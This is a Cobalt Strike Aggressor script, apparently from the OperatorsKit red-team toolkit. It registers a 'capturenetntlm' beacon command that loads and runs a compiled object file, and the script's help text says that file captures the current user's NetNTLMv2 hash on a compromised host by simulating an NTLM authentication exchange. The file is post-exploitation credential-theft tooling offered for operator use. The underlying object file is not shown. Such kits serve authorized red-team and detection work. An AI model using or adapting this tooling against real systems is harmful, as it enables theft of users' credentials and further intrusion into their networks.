OperatorsKit/KIT/CaptureNetNTLM/capturenetntlm.cna

# author REDMED-X

beacon_command_register(
	"capturenetntlm", "Capture the NetNTLMv2 hash of the current user.",
	"INFO:\nCapture the NetNTLMv2 hash of the current user. This is done by simulating a NTLM authentication exchange between a client and server to capture the NetNTLMv2 hash.\n\n" .
	"USAGE:\ncapturenetntlm\n\n");
	
alias capturenetntlm {
    $bid = $1;

    # Read in the right BOF file
    $handle = openf(script_resource("capturenetntlm.o"));
    $data = readb($handle, -1);
    closef($handle);

	blog($bid, "Tasked to capture the current user's NetNTLMv2 hash..");
    beacon_inline_execute($bid, $data, "go", $null);
}